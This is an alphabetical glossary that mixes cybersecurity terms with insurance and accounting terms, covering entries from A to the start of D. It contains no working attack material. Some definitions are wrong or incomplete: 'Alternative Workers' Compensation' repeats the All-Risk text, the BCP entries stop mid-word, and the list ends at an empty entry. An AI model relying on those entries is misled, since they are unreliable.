A
Acceptable Use Policy
Acceptable Use Policy defines the level of access and degree of use of the organization’s network or internet by its members.
Access Control List
An Access Control List (ACL) filters network traffic by controlling whether it is allowed or blocked.
Access Path
An access path is the logical sequence that leads to the location on a computer where an object, such as a web page or file, is stored.
Access Point
An access point is a computer networking device which allows a Wi-Fi compliant device to connect to a wired network and usually connects via a router.
Access Profile
An access profile is information about a user stored on a computer, including their password, name, and what they are allowed access to.
Access Rights
Access rights are the privileges or permissions granted to a user or a program to access, alter, edit, or delete files stored on a network.
Access Type
Access type is applied to an entity class, mapped superclass or embeddable class, and is used to specify attributes.
Account Hijacking
a type of identity theft in which an attacker breaks into and takes over someone's account to perform malicious actions.
Accountability
Accountability is the ability to trace an action performed on the system to a user, a process, or an application.
Accounting Legend Code
An accounting legend code is a numeric code used to indicate the minimum accounting controls required for items of accountable communications security (COMSEC) material within the control systems.
Accumulation Period
Insured must incur eligible medical expenses at least equal to the deductible amount to establish a benefit period under a major medical expense or comprehensive medical expense policy.
ACL
An Access Control List (ACL) filters network traffic by controlling whether it is allowed or blocked.
Active Security Testing
Active security testing is security testing which involves directly interacting with a target, such as sending packets.
Actual Cash Value
repayment value for indemnification due to loss or damage of property; in most cases it is replacement cost minus depreciation.
Actuarial Report
(PC Insurance) a document or other presentation, prepared as a formal means of conveying to the state regulatory authority and the Board of Directors, or its equivalent, the actuary's professional conclusions and recommendations, of recording and communicating the methods and procedures, of assuring that the parties addressed are aware of the significance of the actuary's opinion or findings and that documents the analysis underlying the opinion. (In Life and Health) this document would be called an "Actuarial Memorandum."
Actuary
business professional who analyzes probabilities of risk and risk management including calculation of premiums, dividends, and other applicable insurance industry standards.
Ad Hoc Network
An ad hoc network is a local area network (LAN) that builds spontaneously as devices connect. An ad hoc network does not rely on a base station to coordinate the different points; rather, the individual nodes forward packets to and from each other.
Address Resolution Protocol
Address Resolution Protocol (ARP) is used for discovering a machine's physical (MAC) address and associating it with its Internet Protocol (IP) address.
Adjuster
a person who investigates claims and recommends settlement options based on estimates of damage and insurance policies held.
Administrative Safeguards
Administrative safeguards are a special set of the HIPAA security rules. Administrative safeguards focus on internal organization, policies and procedures, and the maintenance of security measures in place to protect sensitive patient information.
Admitted Assets
insurer assets which can be valued and included on the balance sheet to determine the financial viability of the company.
Admitted Company
An insurance company licensed to do business in a state(s), domiciled in an alternative state or country.
Advanced Encryption Standard
The Advanced Encryption Standard, or AES, is a symmetric block cipher chosen by the U.S. government to protect classified information and is implemented in software and hardware throughout the world to encrypt sensitive data.
Advanced Penetration Testing
Advanced penetration testing is the process of testing a network to discover the vulnerabilities that leave it open to harmful intruders, and then addressing and remedying those issues.
Advanced Persistent Threat
An advanced persistent threat (APT) is a network attack in which an unauthorized person gains access to a network and stays there undetected for a long time.
Advanced Premiums
occur when a policy has been processed, and the premium has been paid prior to the effective date. These are a liability to the company and not included in the written premium or the unearned premium reserve.
Adversary
An adversary is a process, user, or device that poses a threat to the network.
Adverse Selection
the social phenomenon whereby persons with a higher-than-average probability of loss seek greater insurance coverage than those with less risk.
Advisory Organization
a group supported by member companies whose function is to gather loss statistics and publish trended loss costs.
Adware
Adware is a type of malware. It downloads to your device and displays advertisements based on your online activity or browsing history. Adware can appear as intrusive interstitials (pop-ups) and may slow down your device.
AES
The Advanced Encryption Standard, or AES, is a symmetric block cipher chosen by the U.S. government to protect classified information and is implemented in software and hardware throughout the world to encrypt sensitive data.
Affiliate
a person or entity that directly, or indirectly, through one or more other persons or entities, controls, is controlled by or is under common control with the insurer.
Agent
an individual who sells, services, or negotiates insurance policies either on behalf of a company or independently.
Aggregate
the maximum dollar amount or total amount of coverage payable for a single loss, or multiple losses, during a policy period, or on a single project.
Aggregate Cost Payments
method of reimbursement of a health plan with a corporate entity that directly provides care, where (1) the health plan is contractually required to pay the total operating costs of the corporate entity, less any income to the entity from other users of services, and (2) there are mutual unlimited guarantees of solvency between the entity and the health plan that put their respective capital and surplus at risk in guaranteeing each other.
Air Gap
An air gap is a network security measure that ensures a secure computer network is physically isolated from unsecured networks.
ALAE
an estimate of the claims settlement associated with a particular claim or claims.
Alert Situation
An alert situation arises when an interruption in an enterprise is not resolved even after the completion of the threshold stage; an alert situation requires the enterprise to start its escalation procedure.
Alien Company
an insurance company formed according to the laws of a foreign country. The company must conform to state regulatory standards to legally sell insurance products in that state.
All-Risk
also known as open peril, this type of policy covers a broad range of losses. The policy covers risks not explicitly excluded in the policy contract.
Allied Lines
coverages which are generally written with property insurance, e.g., glass, tornado, windstorm, and hail; sprinkler and water damage; explosion, riot, and civil commotion; growing crops; flood; rain; and damage from aircraft and vehicle, etc.
Alternate Facilities
Alternate facilities are secondary facilities, such as offices and data processing centers, from which high-priority emergency tasks can be performed or delivered when the primary facilities are interrupted or unavailable.
Alternate Process
An alternate process is a backup process devised to keep business-critical processes running without interruption from the time the primary enterprise system breaks down until it is restored.
Alternative Workers’ Compensation
also known as open peril, this type of policy covers a broad range of losses. The policy covers risks not explicitly excluded in the policy contract.
Ambulatory Services
health services provided to members who are not confined to a health care institution. Ambulatory services are often referred to as "outpatient" services.
Analog
Analog is a transmission signal, represented as a sine wave, that varies in signal strength (amplitude) or frequency (over time). The wave's higher and lower points denote the value of the signal strength, while its physical length indicates the value of time.
Annual Statement
An annual report must be filed with each state where an insurer does business. This report provides a snapshot of the financial condition of a company and significant events which occurred throughout the reporting year.
Annuitant
the beneficiary of an annuity payment, or the person during whose life an annuity is payable.
Annuities- Immediate Non-Variable
an annuity contract that provides for the fixed payment of the annuity at the end of the first interval of payment after purchase. The interval may vary; however, the annuity payouts must begin within 13 months.
Annuity
a contract providing income for a specified period of time, or duration of life for a person or persons.
Anonymizing Proxy
Anonymizing proxies allow the user to hide their web browsing activity. They are often used to bypass web security filters—e.g., to access blocked sites from a work computer.
Anti-Spam
Anti-spam programs can detect unwanted email and prevent it from reaching user inboxes.
Anti-Virus Software
Antivirus software is a program or a set of programs that helps prevent any malicious object, code, or program from entering your computer or network. If any such malicious program does enter your computer, antivirus software helps detect, quarantine, or remove it from the computer or network.
APT
An advanced persistent threat (APT) is a network attack in which an unauthorized person gains access to a network and stays there undetected for a long time.
ARP
Address Resolution Protocol (ARP) is used for discovering a machine's physical (MAC) address and associating it with its Internet Protocol (IP) address.
Anti-Spyware
Anti-spyware is a type of software designed to detect and remove unwanted spyware programs.
Antivirus
Antivirus is software that is designed to prevent, search for, detect, and remove software viruses, and other malicious software like worms, trojans, adware, and more.
App Attack
An app attack occurs when a user unknowingly installs a harmful app on their tablet or smartphone and the app in turn steals their personal data.
Appliances
Appliances are a combination of hardware and software security elements in one solution. This lets you plug appliances in rather than installing the software separately.
Application Control
Application control allows you to control the use of applications that may be inappropriate for use on business computers or networks.
Application Layer
The application layer is one of the seven layers of the Open Systems Interconnection (OSI) model and the top layer of the TCP/IP protocol suite. The application layer defines the way process-to-process communication happens in a network; it offers only the communication interface and end-user services.
Appraisal
an estimate of value
Arbitration
a binding dispute resolution tactic whereby a conciliator with no interest in the outcome intercedes.
Architecture
Architecture is a structure that defines or describes the very fundamentals of a system or an organization, its components, the relationship between each of these components, their relationship to the overall system, and finally, their effectiveness in guiding the system towards its goals.
Assessed Value
Estimated value for real or personal property established by a taxing entity.
Asset
probable future economic benefits obtained or controlled by a particular entity because of past transactions or events. An asset has three essential characteristics: It embodies a probable future benefit that involves a capacity, singly or in combination with other assets, to contribute directly or indirectly to future net cash inflows; A particular entity can obtain the benefit and control others' access to it; and the transaction or other event-giving rise to the entity's right to or control of the benefit has already occurred.
Asset Risk
in the risk-based capital formula, risk assigned to the company's assets.
Assigned Risk
A governmental pool established to write business declined by carriers in the standard insurance market.
Assisted Living Care
a policy or rider that provides coverage only while a policyholder is confined to an assisted living facility and meets the policy requirements for coverage.
Assumed Reinsurance
the assumption of risk from another insurance entity within a reinsurance agreement or treaty.
Asymmetric Key (Public Key)
An Asymmetric Key (public key) is a security measure that uses two keys to ensure the confidentiality of a message. One key encrypts the message, while the other key decrypts it.
Attack
An attack is an action with malicious intention to interrupt the operations of a network or steal the data, etc.
Attack Mechanism
An Attack Mechanism is a system or strategy by which a target is hit; the attacker may use different attack mechanisms such as a container or payload to hit the intended target.
Attack Vector
An Attack Vector is a means and way by which an attacker gains entry into the target system. Attackers mainly use the human element or the weak links to gain such access.
Attenuation
Attenuation is the weakening of signal strength, analog or digital, especially when transmitted over long distances.
Audit Trail
An audit trail is a detailed history of transactions that helps you trace a piece of information back to its origin. In computing, an audit trail or log helps maintain security and recover lost data.
Authentication
Authentication is the process of verifying a piece of information, that is, the veracity of the information provided. In computing, it is the process of identifying a person or system by means of a username, password, etc. Authentication helps individuals and systems gain authorization based on their identity.
Authenticity
Authenticity is the proof or validity that a claimed identity (whether human or a resource) is real and legitimate.
Authorized Company
an insurer licensed or admitted to do business in a particular state.
Authorized Control Level Risk Based Capital
theoretical amount of capital plus surplus an insurance company should maintain.
Authorized Reinsurance
reinsurance placed with a reinsurer licensed or otherwise allowed to conduct reinsurance within a state.
Autorun Worm
Autorun worms are malicious programs that take advantage of the Windows Autorun feature. They execute automatically when the device on which they are stored is plugged into a computer.
Availability
Availability is the time duration a system or resource is ready for use.
B
Backdoor
A backdoor is a method, often secret, of bypassing normal authentication or encryption in a computer system.
Backdoor Trojan
A backdoor Trojan allows someone to take control of a user’s computer without their permission.
Backup
A backup refers to the archiving of data so it may be used to restore the original after a data loss event.
Balance Sheet
accounting statement showing the financial condition of a company at a particular date.
Bandwidth
Bandwidth is the capacity of a communication channel to pass data through in a given amount of time.
Banner
A banner is a display on an information system that sets the parameters for system or data use.
Banner Grabbing
Banner grabbing is the process of collecting the banner information, such as application type and version, that a remote port transmits when a connection is initiated.
Baseline
A security baseline defines a set of basic security objectives which must be met by any given service or system.
Baseline Security
Baseline security is the minimum set of security controls required for safeguarding an IT system. Baseline security is based upon a system’s identified needs for confidentiality, integrity, and availability protection.
Bastion
A bastion is a system with a high level of security protection; such a system offers very strong protection against attacks.
Bastion Host
A bastion host is a special services computer on a network that is designed to withstand attacks.
Behavioral Outcome
A Behavioral outcome is what an individual who has completed a specific training module is expected to accomplish on regular IT security job performance.
Beneficiary
an individual who may become eligible to receive payment due to will, life insurance policy, retirement plan, annuity, trust, or another contract.
Biometrics
Biometrics is a security system, which considers the unique physiological characteristics of a person such as fingerprints, DNA, hair, etc., for identification purposes.
Bit Error Rate
A bit error rate is the ratio between the number of bits incorrectly received and the total number of bits transmitted in a telecommunication system.
Black Core
A black core is a communication network architecture in which user data traversing a global internet protocol (IP) is end-to-end encrypted at the IP layer.
Blacklist
A blacklist is a basic access control mechanism that allows through all elements except those explicitly mentioned.
Blanket Coverage
coverage for property and liability that extends to more than one location, class of property or employee.
Blended Attack
A blended attack is a hostile action with the intent of spreading malicious code.
Block Cipher
A block cipher is a method of encrypting text and information in fixed-size blocks, strings, or groups at a time, rather than encrypting individual bits.
Block Cipher Algorithm
A block cipher algorithm is a family of functions and their inverses, parameterized by a cryptographic key, in which the functions map bit strings of a fixed length to bit strings of the same length.
Bonds
a form of debt security whereby the debt holder has a creditor stake in the company. Obligations issued by business units, governmental units and certain nonprofit units having a fixed schedule for one or more future payments of money; includes commercial paper, negotiable certificates of deposit, repurchase agreements and equipment trust certificates.
BCP
A Disaster Recovery Plan (DRP) or a Business Continuity Plan (BCP) prescribes steps required to carry on the business as usual in a disaster. Disaster recovery plan aims to bring business activities back to normalcy in the shortest possible time; such efforts require an in
Book Value
original cost, including capitalized acquisition costs and accumulated depreciation, unamortized premium and discount, deferred origination and commitment fees, direct write-downs, and increase/decrease by adjustment.
Boot Sector Malware
Boot sector malware spreads by modifying the program that enables your computer to start up.
Bot
A bot is a type of software or script that performs automated tasks on command.
Botnet
A botnet is a network of private computers infected with malicious software. A botnet may be controlled without the owner's knowledge or used to send spam messages.
Boundary
A boundary is a fence or an imaginary line, which indicates the limit of an organization, and its relationship with its neighbors.
Bridge
A bridge is an electronic device that connects two networks, such as LANs that use the same protocol (for example Ethernet or Token Ring), and creates two distinct LANs or wide area networks. Operating at the data link layer of the Open Systems Interconnection model, bridges can filter information and pass it to the right nodes, or decide not to pass it at all. They also help streamline or reduce the volume of traffic on a LAN by dividing it into two segments.
Bring Your Own Device
A policy where employees can connect their devices to corporate applications and networks.
Broadcast
A Broadcast is a process of transmitting the same message to multiple users simultaneously.
Broker
an individual who receives commissions from the sale and service of insurance policies. These individuals work on behalf of the customer and are not restricted to selling policies for a specific company, but commissions are paid by the company with which the sale was made.
Browser Hijacker
Browser hijackers change the default homepage and search engine in your Internet browser without your permission.
Brute Force
Brute force is a computing method that relies on raw computing power to try candidate solutions exhaustively until it finds the solution to a given issue.
Brute Force Attack
A brute force attack is the process of finding a secret, such as a password or decryption key, by trying many probable variants of it one after another until one works.
Bug
A bug is an unintended software or hardware problem. These can be minor problems or error screens that don’t necessarily compromise a system. However, it can also be more significant and render a system inoperable.
Buffer Overflow
A buffer overflow occurs when a program or process attempts to write more data to a fixed-length block of memory than that block can hold.
Burglary and Theft
coverage for property taken or destroyed by breaking and entering the insured's premises, burglary or theft, forgery or counterfeiting, fraud, kidnap and ransom, and off-premises exposure.
Business Continuity Plan
A Disaster Recovery Plan (DRP) or a Business Continuity Plan (BCP) prescribes steps required to carry on the business as usual in a disaster. Disaster recovery plan aims to bring business activities back to normalcy in the shortest possible time; such efforts require an in
Business Impact Analysis/Assessment
A Business Impact Analysis/Assessment is the process of evaluating and identifying risks and threats that a business might face in the event of an accident, disaster, or an emergency. It evaluates the possible risk to tangible and intangible assets such as personal, infrastructure, data, and goodwill. In addition, it offers steps needed to recover from any such disasters.
Business Interruption
Loss of income from property damage to a business facility.
Business Owners Policy
business insurance typically for property, liability, and business interruption coverage.
BYOD
A policy where employees can connect their devices to corporate applications and networks.
C
Cache
A place to temporarily store something in a computing environment. Active data is often cached to shorten data access times, reduce latency, and improve input/output (improve application performance).
Calendar Year Deductible
in health insurance, the amount that must be paid by the insured during a calendar year before the insurer becomes responsible for further loss costs.
Capital and Surplus
a company's assets minus its liabilities.
Capital and Surplus Retirement
statutory requirement ordering companies to maintain their capital and surplus at an amount equal to or in excess of a specified amount to help assure the solvency of the company by providing a financial cushion against expected loss or misjudgments and generally measured as a company's admitted assets minus its liabilities, determined on a statutory accounting basis.
Capital Gains (Loss)
excess (deficiency) of the sales price of an asset over its book value. Calculated based on original cost adjusted, as appropriate, for accrual of discount or amortization of premium and for depreciation.
Capitation Arrangement
A compensation plan used in connection with some managed care contracts where a physician or other medical provider is paid a flat amount, usually monthly, for each subscriber who has chosen to use that physician or medical provider. Capitated payments are sometimes expressed in terms of a "per member/per month" payment. The capitated provider is generally responsible, under the conditions of the contract, for delivering or arranging for the delivery of all contracted health services required by the covered person.
Captive Agent
an individual who sells or services insurance contracts for a specific insurer or fleet of insurers.
Captive Insurer
An insurance company established by a parent firm to insure the parent's exposures.
Carrying Value (Amount)
the SAP book value plus accrued interest and reduced by any valuation allowance and any non-admitted adjustment applied to the individual investment.
Cash
a medium of exchange
Cash Equivalent
short-term, highly liquid investments that are both (a) readily convertible to known amounts of cash, and (b) so near their maturity that they present insignificant risk of changes in value because of changes in interest rates. Investments with original maturities of three months or less qualify under this definition.
Casualty Insurance
a form of liability insurance providing coverage for negligent acts and omissions such as workers compensation, errors and omissions, fidelity, crime, glass, boiler, and various malpractice coverages
Catfishing
when someone uses a social network to create an account with a fake identity in order to deceive a specific person.
Catastrophe Bonds
Bonds issued by an insurance company with funding tied to the company's losses from disasters or acts of God. A loss exceeding a certain size triggers a reduction in the bond value or a change in the bond structure as loss payments are paid out of bond funds.
Catastrophe Loss
a large magnitude loss with little ability to forecast.
Category
A category is a restrictive label applied to classified or unclassified information to limit access.
Ceded Premium
amount of premium (fees) used to purchase reinsurance.
Ceding Company
an insurance company that transfers risk by purchasing reinsurance.
Central Service Node
A Central Services Node is the Key Management Infrastructure core node that provides central security management and data management services.
Certificate Authority
A Certificate Authority (CA) is an independent third party that verifies the online identity of an entity. They issue digital certificates that contain information about the owner of the certificate and details of the certificates, thus verifying the identity of the owner.
Certificate Management
Certificate Management is the process in which certificates are generated, used, transmitted, loaded, and destroyed.
Certification Revocation List
A Certificate Revocation List (CRL) is a list, published and signed by a Certificate Authority, of the digital certificates it has revoked before their scheduled expiry; a certificate that appears on the CRL should no longer be trusted.
Chain of Custody
A chain of custody is a process that defines the rules for evidence to be legally accepted. A neutral third party with no interest in the case collects the evidence after properly identifying it, and the evidence remains accounted for until it is presented in a court of law. The collector makes the evidence tamper-proof and seals it tightly. The record contains complete information about the evidence: how it was collected and who had access to it.
Chain of Evidence
The chain of evidence shows who obtained the evidence, where the evidence came from, and who secured, controlled, and possessed it. The chain of evidence proceeds in the following order: collection and identification; analysis; storage; preservation; presentation in court; return to owner.
Challenge Response Protocol
A challenge-response protocol is an authentication method in which one party presents a challenge, typically a random value, and the other party must return a valid response computed from that challenge and a secret it holds; a correct response proves possession of the secret without transmitting the secret itself.
Change in Valuation Basis
a change in the interest rate, mortality assumption or reserving method or other factors affecting the reserve computation of policies in force.
Chartered Life Underwriter (CLU)
a professional designation awarded by the American College to persons in the life insurance field who pass a series of exams in insurance, investment, taxation, employee benefit plans, estate planning, accounting, management, and economics.
Checksum
A checksum is a simple type of redundancy check that is used to detect errors in data.
Chief Information Security Officer
A Chief Information Security Officer is a senior level executive of an organization entrusted with the responsibilities of protecting the information assets of the businesses and making sure that the information policies of the organization align with the objectives of the organization.
Chief Security Officer
The Chief Security Officer is an executive of the company with assigned responsibility for protecting assets such as infrastructure and personnel, including information in digital and physical form.
Cipher
A cipher is a process that converts data into code, or encrypts it, with the help of an algorithm; to decipher the code, a key is required.
Cipher Text
Ciphertext is data converted from plain text into code using an algorithm, making it unreadable without the key.
Ciphony
Ciphony is the process of enciphering audio information to produce encrypted speech.
C&C
A command-and-control center (C&C) is a computer that controls a network of compromised computers.
CAPEC
Common Attack Pattern Enumeration and Classification (CAPEC) is a document published by the MITRE Corporation that details how vulnerable systems are attacked. The community-developed document describes common attack patterns and how such attacks are executed.
CERT
A Computer Emergency Response Team (CERT) is a team formed to study the vulnerabilities of an organization's information systems and offer solutions and strategies for dealing with them. Such teams are highly organized, with clearly defined roles and responsibilities.
Claim
a request made by the insured for insurer remittance of payment due to loss incurred and covered under the policy agreement.
Claimant
A claimant is the party who needs to be identified via an authentication protocol.
Claims Adjustment Expenses
costs expected to be incurred in connection with the adjustment and recording of accident and health, auto medical and workers' compensation claims.
Claims-Made Form
A type of liability insurance form that only pays if both the event that causes (triggers) the claim and the actual claim are submitted to the insurance company during the policy term.
Class Rating
a method of determining rates for all applicants within a given set of characteristics such as personal demographic and geographic location.
Cleartext
Cleartext is data in ASCII format or data that is not coded or encrypted. All applications and machines support plain text.
Click Fraud
Scammers generate money using fake clicks. They will sometimes hire people and pay them to click on ads from several devices to earn affiliate or advertising cash for an app install or website visit.
Clinger-Cohen Act of 1996
The Clinger-Cohen Act is also known as the Information Technology Management Reform Act. This statute made significant changes in the way that IT resources are managed and procured. The most significant aspect of this act is the requirement that each agency design and implement a process for maximizing the value and assessing and managing the risks of IT investments.
Closed Source
a proprietary technology whose copyright hides its source code and forbids its distribution or modification. Examples of closed source commercial software are Skype, Java, Opera.
Cloud Computing
Cloud computing is the on-demand delivery of computer power, database storage, applications, and other IT resources through a cloud services platform via the internet with pay-as-you-go pricing.
Cloud Security
Cloud security refers to a broad set of policies, technologies, and controls deployed to protect data, applications, and the associated infrastructure of cloud computing.
Coinsurance
A clause contained in most property insurance policies to encourage policy holders to carry a reasonable amount of insurance. If the insured fails to maintain the amount specified in the clause (Usually at least 80%), the insured shares a higher proportion of the loss. In medical insurance a percentage of each claim that the insured will bear.
Cold Site
A cold site is a backup facility that provides space, power and network connectivity, and usually standard office fittings such as furniture and telephones, but little or no computer equipment. Hardware must be delivered, installed and restored from backups before the site can take over, so recovery typically takes days rather than hours, unlike a warm or hot site. Basically, a cold site is a facility ready to receive computer equipment should operations need to move to an alternate location.
Collar
an agreement to receive payments as the buyer of an Option, Cap or Floor and to make payments as the seller of a different Option, Cap or Floor.
Collateral Loans
unconditional obligations for the payment of money secured by the pledge of an investment.
Collateralized Bond Obligations (CBOs)
an investment-grade bond backed by a pool of low-grade debt securities, such as junk bonds, separated into tranches based on various levels of credit risk.
Collateralized Mortgage Obligations (CMOs)
a type of mortgage-backed security (MBS) with separate pools of pass-through security mortgages that contain varying classes of holders and maturities (tranches) with the advantage of predictable cash flow patterns.
Collision
In networking, a collision is a situation where two or more devices on a shared medium try to transmit to the same device at the same time, so that both transmissions are corrupted. In cryptography, a collision is two different inputs that produce the same hash value; a collision-resistant hash function makes such pairs infeasible to find.
Combinations
a special form of package policy composed of personal automobile and homeowners’ insurance.
Combined Ratio
an indication of the profitability of an insurance company, calculated by adding the loss and expense ratios.
Command and Control Center
A command-and-control (C&C or C2) server is a computer an attacker uses to send instructions to, and receive stolen data from, a network of compromised machines (a botnet).
Commencement Date
Date when the organization first became obligated for insurance risk via the issuance of policies and/or entering a reinsurance agreement. Same as "effective date" of coverage.
Commercial General Liability
flexible & broad commercial liability coverage with two major sub-lines: premises/operations sub-line and products/completed operations sub-line.
Commercial Multiple Peril
policy that packages two or more insurance coverages protecting an enterprise from various property and liability risk exposures. Frequently includes fire, allied lines, various other coverages (e.g., difference in conditions) and liability coverage. Such coverage would be included in other annual statement lines, if written individually. Include under this type of insurance multi-peril policies (other than farm owners, homeowners, and automobile policies) that include coverage for liability other than auto.
Commercial Package Policy
provides a broad package of property and liability coverages for commercial ventures other than those provided insurance through a business owners policy.
Commercial Property
property insurance coverage sold to commercial ventures.
Commission
a percentage of premium paid to agents by insurance companies for the sale of policies.
Common Access Card
A Common Access Card (CAC) is the standard identification smart card issued by the U.S. Department of Defense. Its embedded integrated chip stores public key infrastructure (PKI) certificates and the corresponding private keys, used for physical access, network logon, and e-mail signing and encryption.
Common Attack Pattern Enumeration and Classification
Common Attack Pattern Enumeration and Classification (CAPEC) is a community-developed catalog maintained by the MITRE Corporation that describes common attack patterns: how each attack is executed, the weaknesses it exploits, and how it can be mitigated.
Community Rating
a rating system where standard rating is established and usually adjusted within specific guidelines for each group based on anticipated utilization by the group's employees.
Company Code
a five-digit identifying number assigned by NAIC, assigned to all insurance companies filing financial data with NAIC.
Compartmentalization
Compartmentalization is a technique for protecting confidential information by revealing it only to the few people who need to know it to perform their job. By restricting access to information in this way, the damage a single compromised person or system can cause, and thus the risk to business objectives, is limited.
Completed Operations Liability
policies covering the liability of contractors, plumbers, electricians, repair shops, and similar firms to persons who have incurred bodily injury or property damage from defective work or operations completed or abandoned by or for the insured, away from the insured's premises.
Compliance Documents
A Compliance Document is a document detailing the actions required to comply with or adhere to the set standards by regulatory bodies. Any violations of the said rules attract punitive actions from the regulatory bodies.
Comprehensive General Liability (CGL)
coverage of all business liabilities unless specifically excluded in the policy contract.
Computer Emergency Response Team
A Computer Emergency Response Team (CERT) is a team formed to study the vulnerabilities of an organization's information systems, respond to security incidents, and offer solutions and strategies for dealing with such vulnerabilities. Such teams are highly organized, with clearly defined roles and responsibilities.
Computer Forensics
Computer Forensics is the process of analyzing and investigating computer devices, on suspicion that such devices may have been used in a cybercrime, with the aim of gathering evidence for presentation in a court of law. Computer forensics offers many tools for investigation and analysis to find such evidence.
Concurrent Causation
property loss incurred from two or more perils in which only one loss is covered but both are paid by the insurer due to simultaneous incident.
Conditions
requirements specified in the insurance contract that must be upheld by the insured to qualify for indemnification.
Configuration Management
Configuration Management is the process of identifying, documenting, controlling and auditing the configuration of systems and software (hardware, operating system and application settings, versions and patches) throughout their life cycle, so that every change is authorized and recorded and a system can always be restored to a known, approved baseline.
Consumerization
Consumerization refers to new trends or changes in enterprise technology as more and more consumers embrace such technology. Employees use devices for personal use and as they gain wide acceptance, even organizations start using such technologies.
Containment
Containment is the set of steps taken, once a threat or incident has been identified, to stop it from spreading and limit further damage (for example isolating affected hosts or disabling compromised accounts) while the cause is investigated.
Content Filtering
Content Filtering is a process by which access to certain content, information, data is restricted, limited, or completely blocked based on an organization’s rules. Any objectionable email, website, etc., is blocked using either software or hardware-based tools.
Contingency Reserves
required by some jurisdictions as a hedge against adverse experience from operations, particularly adverse claim experience.
Contract Reserves
reserves set up when, due to the gross premium structure, the future benefits exceed the future net premium. Contract reserves are in addition to claim and premium reserves.
Contractual Liability
liability coverage of an insured who has assumed the legal liability of another party by written or oral contract. Includes a contractual liability policy providing coverage for all obligations and liabilities incurred by a service contract provider under the terms of service contracts issued by the provider.
Control
Control is the policies, strategies, guidelines, etc. established in collaboration with various departments of an organization such as management, legal, technical to help mitigate risk.
Convertible Term Insurance Policy
an insurance policy that can be converted into permanent insurance without a medical assessment. The insurer must renew the policy regardless of the insured's health subject to policy conditions.
Cookie
An HTTP cookie (also called web cookie, Internet cookie, browser cookie, or simply cookie) is a small piece of data sent from a website and stored on the user's computer by the user's web browser while the user is browsing.
Coordination of Benefits (COB)
provision to eliminate over insurance and establish a prompt and orderly claims payment system when a person is covered by more than one group insurance and/or group service plan.
Copay
a cost sharing mechanism in group insurance plans where the insured pays a specified dollar amount of incurred medical expenses, and the insurer pays the remainder.
Corrective Order
commissioner's directive of action to be completed by an insurer.
Counter Measure
A countermeasure is a process, system, or device deployed to reduce a threat or risk to a network or computer.
Covered Lines
The total number of lives insured, including dependents, under individual policies and group certificates.
Cracker
a person, who attacks a specific computer system. Often to steal or corrupt sensitive information or data about a company or a product.
Credit
individual or group policies that provide benefits to a debtor for full or partial repayment of debt associated with a specific loan or other credit transaction upon disability or involuntary unemployment of debtor, except in connection with first mortgage loans.
Credit- Assumption Agreement
An insurance certificate issued on an existing insurance contract indicating another insurer has assumed all the risk under the contract from the ceding insurance company.
Credit- Credit Default
coverage purchased by manufacturers, merchants, educational institutions, or other providers of goods and services extending credit, for indemnification of losses or damages resulting from the nonpayment of debts owed to them for goods or services provided in the normal course of their business.
Credit Disability
makes monthly loan/credit transaction payments to the creditor upon the disablement of an insured debtor.
Credit Health Insurance
policy assigning creditor as beneficiary for insurance on a debtor thereby remitting balance of payment to creditor should the debtor become disabled.
Credit- Involuntary Unemployment
makes loan/credit transaction payments to the creditor when the debtor becomes involuntarily unemployed.
Credit Life Insurance
policy assigning creditor as beneficiary for insurance on a debtor thereby remitting balance of payment to creditor upon death of debtor.
Credit Personal Property Insurance
insurance written in connection with a credit transaction where the collateral is not a motor vehicle, mobile home or real estate and that covers perils to the goods purchased through a credit transaction or used as collateral for a credit transaction and that concerns a creditor's interest in the purchased goods or pledged collateral, either in whole or in part; or covers perils to goods purchased in connection with an open-end transaction.
Credit Placed Insurance
insurance that is purchased unilaterally by the creditor, who is the named insured, after the date of the credit transaction, providing coverage against loss, expense, or damage to property as a result of fire, theft, collision, or other risks of loss that would either impair a creditor's interest or adversely affect the value of collateral. "Creditor Placed Home" means "Creditor Placed Insurance" on homes, mobile homes, and other real estate. "Creditor Placed Auto" means insurance on automobiles, boats, or other vehicles.
Credit Risk
part of the risk-based capital formula that addresses the collectability of a company's receivables and the risk of losing a provider or intermediary that has received advance capitation payments.
Critical Infrastructure
Critical Infrastructure is the set of systems and assets, physical or virtual, so vital to an organization or a nation that their disruption or destruction would have a debilitating effect on its operations, security, economy, or public health and safety.
Criticality
Criticality is the level of importance assigned to an asset or information. The organization may not function effectively or efficiently without a highly critical asset or information.
Cross Site Scripting
An injection attack in which an attacker inserts a malicious script into content served by a website so that it executes in other users' browsers with the site's privileges, allowing session cookies, keystrokes or page contents to be stolen or altered.
Cryptography
Cryptography is the practice of protecting information and communication by transforming it so that only the intended party can read or alter it. It provides confidentiality, integrity, authentication and non-repudiation through techniques such as encryption, hashing and digital signatures.
Crypto jacking
the unauthorized use of someone else's computing resources to mine cryptocurrency, typically through malware installed on the victim's machine or a script injected into a website.
Cryptosystem
A cryptosystem is an algorithm, or set of algorithms, for turning plaintext into ciphertext and back, together with the keys and procedures that govern the transformation. The key controls the conversion from plaintext to ciphertext and vice versa, so the secrecy of the data rests on the secrecy of the key rather than of the algorithm.
Cyberattacks
Cyberattacks are attempts by attackers to damage, disrupt, or gain unauthorized access to computer systems, networks, or the information they hold.
Cyber Security Architecture
Cyber Security Architecture is the information security layout that describes the overall structure of security in an organization, including its various components and their relationships. It shows how data security, controls and preventive mechanisms are implemented across the organization.
Cybercop
A Cybercop is a law enforcement officer entrusted with the responsibilities of monitoring online activities to control criminal activities online or cybercrimes.
Cyberespionage
Cyberespionage is the covert, unauthorized gathering of information from an organization's or government's computer systems, typically by means of malware or network intrusion, to steal or destroy data.
Cyberwarfare
Cyberwarfare is the use of cyberattacks by a nation-state, or by actors working on its behalf, against another nation's networks, infrastructure, or institutions in order to disrupt, damage, or spy on them.
D
Dark Web
The part of the internet that is reachable only through overlay networks such as Tor and is not indexed by search engines. It is a subset of the deep web (content that search engines do not index but that anyone with the correct URL can reach). Dark web sites require special software and addressing (for example Tor and its onion services), and users remain largely anonymous because traffic is routed through several encrypting relays, which makes network activity very difficult to trace.
Data Aggregation
Data aggregation is any process in which information is gathered and expressed in a summary form, for purposes such as statistical analysis.
Data Asset
A data asset is any entity that consists of data; a database, for example, is a data asset. A system or application output file, document, or Web page is also a data asset. A data asset can also be a service that provides access to data from an application.
Data Breach
A data breach is a security incident in which sensitive, protected, or confidential data is copied, transmitted, viewed, stolen, or used by an individual who is not authorized to do so.
Data Classification
Data Classification is a data management process that involves categorizing and organizing data into different classes based on their forms, types, importance, sensitivity, and usage in an organization.
Data Custodian
A Data Custodian is the person or team (typically in IT operations) responsible for the technical administration of data on behalf of its owner: storing it, backing it up, and implementing and maintaining the access controls and other safeguards the owner requires.
Data Element
